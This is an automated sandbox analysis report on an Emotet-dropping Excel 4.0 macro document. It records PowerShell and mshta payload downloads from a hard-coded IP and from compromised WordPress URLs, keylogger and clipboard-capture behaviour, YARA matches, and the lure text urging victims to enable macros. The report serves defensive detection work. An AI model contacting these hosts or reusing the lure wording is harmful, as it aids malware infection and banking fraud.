Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://thaireportchannel.com/wp
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3
Source: powershell.exe, 00000006.00000002.677511514.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: kuyporn.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1Host: kuyporn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1Host: jeffreylubin.igclout.comConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: mshta.exe, 00000004.00000002.434924168.00000000002FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.434924168.00000000002FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Potential key logger detected (key state polling based)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 17.2.rundll32.exe.330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.28f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2890000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2280000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2340000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2280000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2170000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2830000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.330000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e10000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3150000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23f0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.28a0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.440000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.26d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.6c0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.630000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2840000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3190000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2870000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.28c0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2160000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2740000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4f0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2340000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.26d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2950000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.470000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2890000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4f0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2dc0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4f0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.28f0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2950000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2740000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23f0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4c0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3160000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e10000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.660000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2490000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.630000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.27c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3190000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2890000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2700000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2170000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED

System Summary
barindex
Found malicious Excel 4.0 Macro
Source: 80_513972285.xls Macro extractor: Sheet: Macro1 contains: mshta
Source: 80_513972285.xls Macro extractor: Sheet: Macro1 contains: mshta
Malicious sample detected (through community Yara rule)
Source: 80_513972285.xls, type: SAMPLE Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 :: Previewing is not available for protected documents. 14 15 Yo
Source: Screenshot number: 8 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G) I I 23 24 25 26
Document contains OLE streams with names of living off the land binaries
Source: 80_513972285.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
Source: 80_513972285.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. 